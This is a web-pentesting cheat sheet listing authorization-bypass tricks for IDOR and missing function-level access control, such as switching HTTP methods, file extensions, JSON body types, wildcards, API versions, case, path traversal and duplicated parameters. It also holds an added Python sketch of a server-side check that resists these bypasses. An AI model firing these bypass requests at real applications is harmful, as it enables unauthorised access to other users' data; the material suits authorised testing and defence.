pwny.cc
Insecure Direct Object Reference (IDOR)
Change HTTP method
    GET /users/delete/123 -> 403
    POST /users/delete/123 -> 200
Change file extension
Try changing the extension of the endpoint you found.
    #Endpoint found
    /users/password -> 401

    #Endpoints to test
    /users/password.json
    /users/password.xml
Convert request body
Convert the identifier in the request body to an array, or nest it inside another JSON object.
    #Original body
    {"id":1}

    #Bypasses
    {"id":[1]}
    {"id":{"id":1}}
Test wildcards
Change the identifier of the request to a wildcard.
    #Original request
    /api/v1/userlist/user1

    #Wildcard bypasses
    /api/v1/userlist/*
Check another version
Many API endpoints expose the version in the request; try changing it to an older one.
    #Original request
    /api/v3/user/user3

    #Changed version of the same endpoint
    /api/v2/user/user3
    /api/v1/user/user3
Missing Function Level Access Control (MFLAC)
    GET /admin/profile -> 401
    GET /ADMIN/profile -> 200
Path Traversal Secondary Context
    #Original request
    POST /users/delete/123 -> 403

    #Bypass
    POST /users/delete/MY_ID/../123 -> 200
HTTP Parameter Pollution
    GET /api/v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID
    GET /api/v1/messages?user_id=VICTIM_ID&user_id=ATTACKER_ID
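The server-side counterpart to several of the cases above (method change, extension, case, path traversal, wildcard, body type, duplicated parameters), as an added example that is not part of the original page. The route prefixes, function names and status codes are hypothetical, and it assumes the router matches paths case-insensitively.

```python
import posixpath
from urllib.parse import parse_qs, unquote

# Hypothetical rules keyed on the canonical path only, so the same
# decision applies to GET, POST and every other method.
OWNER_ONLY = ("/users/delete/", "/api/v1/messages")
ADMIN_ONLY = ("/admin/",)

def canonical_path(raw_path):
    """Decode once, resolve dot segments, lowercase, drop a format suffix."""
    path = posixpath.normpath(unquote(raw_path)).lower()
    for suffix in (".json", ".xml"):
        if path.endswith(suffix):
            path = path[: -len(suffix)]
    return path

def scalar_id(value):
    """Accept one int or ASCII digit string; reject arrays, objects, wildcards."""
    if isinstance(value, bool) or not isinstance(value, (int, str)):
        return None
    text = str(value)
    return int(text) if text.isascii() and text.isdigit() else None

def authorize(method, raw_path, query, body, user_id, is_admin=False):
    """Return the status the access-control layer answers with.
    `method` is deliberately ignored: it never relaxes the check."""
    path = canonical_path(raw_path)
    if path.startswith(ADMIN_ONLY):
        return 200 if is_admin else 403
    if not path.startswith(OWNER_ONLY):
        return 404  # unknown route: fail closed
    params = parse_qs(query)
    if any(len(values) > 1 for values in params.values()):
        return 400  # duplicated parameter: refuse instead of picking one
    if path.startswith("/users/delete/"):
        target = scalar_id(path.rsplit("/", 1)[1])
    elif "user_id" in params:
        target = scalar_id(params["user_id"][0])
    else:
        target = scalar_id(body.get("id") if isinstance(body, dict) else None)
    if target is None:
        return 400
    # Ownership is decided from the session's user_id, never from the request.
    return 200 if target == user_id else 403
```

The ownership comparison runs on the canonical path and a strictly typed identifier, so each variant of the request reaches the same decision as the original one.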
References
Autorize
Burp Suite extension aimed at helping the penetration tester to detect authorization vulnerabilities
Auto Repeater
Burp Suite extension that automatically repeats requests, with replacement rules and response diffing
Last modified
6mo ago